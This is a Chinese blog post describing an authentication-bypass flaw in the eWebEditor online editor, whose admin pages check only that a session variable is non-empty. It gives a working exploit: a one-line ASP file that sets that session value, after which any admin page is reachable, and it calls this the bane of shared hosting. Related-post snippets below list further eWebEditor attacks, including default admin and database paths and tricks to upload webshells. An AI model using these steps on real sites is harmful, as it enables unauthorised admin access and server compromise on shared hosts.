eWebEditor session欺骗漏洞

最新推荐文章于 2024-01-23 23:07:44 发布
最新推荐文章于 2024-01-23 23:07:44 发布
阅读量1.1k 收藏
点赞数
分类专栏: 安全 文章标签: session cookies user

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星. 

maierken
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
暴力破解漏洞——密文爆破、Session 固定攻击 (未授权)、密文传输爆破、Cookie 欺骗漏洞
m0_61506558的博客
08-20 997
目录(一) Authorization 爆破1、先随便写admin、password 2、BP抓包,读取报文 2、BP选择配置 (二)密文传输爆破 1、BP抓取报文 2、找name字段 3、找到txt_password加密方式(三)Session 固定攻击 (未授权)(四)Cookie 欺骗漏洞1.case1 2. case23.case3 ​编辑 与之前读取的报文是不一样的,观察到Authorization字段,进行Base64编码选择自定义迭代器 填写爆破字典 进行Base64编码,开始爆破点击密码框,
webeditor漏洞基础知识
Coisini的博客
05-25 1181
eWebEditor eWebEditor利用基础知识 默认后台地址:/ewebeditor/admin_login.asp 建议最好检测下admin_style.asp文件是否可以直接访问 后台:admin/ewebeditor/admin_login.asp 数据库:admin/ewebeditor/db/ewebeditor.mdb 限制ASP 改成asaspp aaspsp ...
session文件欺骗(旁注不可跨目录时思路)
IT技术宅-北方的刀郎
03-21 1481
session文件欺骗(旁注不可跨目录时思路)本文的理论意义可能会大于实践意义,仅为实在没办法的时候提供思路。 0x00 session介绍0x01 利用条件0x02 利用思路0x03 漏洞证明0x04 防范方法 0x00 session介绍 一般的web认证方式都是通过cookie或者session来进行的。众所周知,cookie是存在本地的,客户端可以随意修改;而session是以文本文件形式
session文件包含漏洞详解
永远是少年
12-14 1619
今天继续给大家介绍渗透测试相关知识,本文主要内容是session文件包含漏洞详解。 一、session文件包含简介 二、session文件包含实战
Ewebeditor 的一些漏洞总结
eldn__的专栏
06-23 1万+
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),  NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb  默认的后台路径是admi
ewebeditor漏洞利用汇总
weixin_34081595的博客
07-13 1231
ewebeditor漏洞利用汇总 2007年09月24日 星期一 22:43 inurl:ewebeditor 现在eWebSoft在线编辑器用户越来越多,危害就越来越大~ 首先介绍编辑器的一些默认特征: ...
网络安全专业名词解释
aixmmmlll的博客
05-16 3873
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
网络安全面试题
热门推荐
fzx_hsaj的博客
02-12 6万+
在当今社会网络安全行业越来越发达,也有越来越多的人去学习,为了更好地进行工作,除了学好知识外还要应对企业的面试。 所以在这里我归总了一些网络安全方面的常见面试题,希望对大家有所帮助。 windows常见 1:描述tcp/udp的区别及优劣,及其发展前景 TCP—传输控制协议,提供的是面向连接、可靠的字节流服务。当客户和服务器彼此交换数据前,必须先在双方之间建立一个TCP连接,之后才能...
网络安全类面试题整理1
jaivy的博客
09-20 2万+
面试题整理   如何查找网页漏洞? 网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。针对这么多的漏洞威胁,网站管理员要对自己的网站进行安全 检测,然后进行安全设置或者代码改写。那如何来检测网站存在的漏洞呢?其实,很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。那么网站的 管理员就可以利用这些工具对网站进行安全检测,看有没有上述漏洞,笔者就不一一
一文让你彻底搞懂cookie和session产生漏洞的原理
最新发布
carrot11223的博客
01-23 1095
这种再次请求的时候,cookie里面就不会再出现敏感值,但是存在sessionid的值,一个sessionid对应一个sessionsession可以理解为打电话,如果一方挂断了电话,就结束了本次通话,当第二次用另一个浏览器进行访问的时候(另外一次电话连接),sessionid就已经变了,不同的电话连接有不同的session,既然cookie可以进行cookie伪造,那session可以嘛?那盗取又是什么意思呢?可以看到无论是cookie还是session都可以进行身份验证,只是储存的位置不一致。
eWebEditor编辑器入侵网站提权&&Cookies欺骗登陆管理员账号
xlh006的博客
09-17 1430
一、介绍eWebEditor eWebEditor是一个基于浏览器的在线HTML编辑器,WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框 二、获得eWebEditor后台登录地址 ewebeditor/Admin_Login.asp 三、登录 四、拷贝样式 五、修改样式设置 六、上传小马 七、访问OK   一、介绍Cookies Cookies就是服务器暂时存...
WebEdit在线编辑器的问题与漏洞(转)
turboking的专栏
04-27 3460
WebEdit在线编辑器的问题与漏洞Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛。对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),NO1.ewebeditor编辑
ewebeditor漏洞大全
xysoul的专栏
03-23 1万+
1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览 在编辑器里点设计    然后直接上传asa大马. 上传后 在代码里可以看到马的位置!
Ewebeditor最新漏洞漏洞大全
weixin_34357928的博客
08-02 296
Ewebeditor最新漏洞漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集,如今的站点大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。 漏洞更新日期TM: 2009 2...
Ace Editor在线Web编辑代码强力武器
程序猿开发日志【学习永无止境】
11-01 1万+
首先说明:ACE 是一个实现了语法着色功能的基于 Web 的代码编辑器,具有良好的代码提示功能和大量的主题,所以在Web端你想拥有一个编辑器,ACE是不二选择。 正是因为在这上面踩了一个大大的坑,而且文档基本都是英文的,并不是说英文文档就看不懂,但是麻烦啊,所以有必要特此说明下这玩意到底应该怎么用。 先上一个我最后的结果 是不是很棒? 好,然后接下来就是我研究的步骤了
Cookies欺骗session欺骗入侵
eldn__的专栏
11-20 5220
Cookies欺骗session欺骗入侵 cookies欺骗,就是在只对用户做cookies验证的系统中,通过修改cookies的内容来得到相应的用户权限登录。 那么什么是cookies呢,我这里给大家一个专业的解释,cookies是一个储存于浏览器目录中的文本文件,记录你访问一个特定站点的信息,且 只能被创建这个cookies的站点读回,约由255个字符组成,仅占4kb硬盘空间。当用户正在
关于web项目sessionID欺骗的问题
a563501734的博客
11-05 8004
我在做用户登陆时大费周章,又是rsa又是md5的,忽然想起DNS欺骗的问题,如果用户被dns劫持,不管我用什么样的方法,用户如果在被劫持的页面上输入密码都毫无安全可言,并且https我们是不可能用的,瞎将就吧,我只能寄希望于用户装了某管家或某卫士。 但是后面的问题更严重,大家都知道http依赖cookie保持会话状态,我们大费周章地用各种加密方式来保护用户密码,最后却转化成为十几二十个明文字符来...
ewebeditor漏洞
08-23
综上所述,ewebeditor存在文件上传漏洞,攻击者可以通过利用漏洞访问服务器上的文件,并进行恶意操作。建议用户及时更新并使用最新版本的编辑器,以避免潜在的安全风险。<span class="em">1</span><span class="em">...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值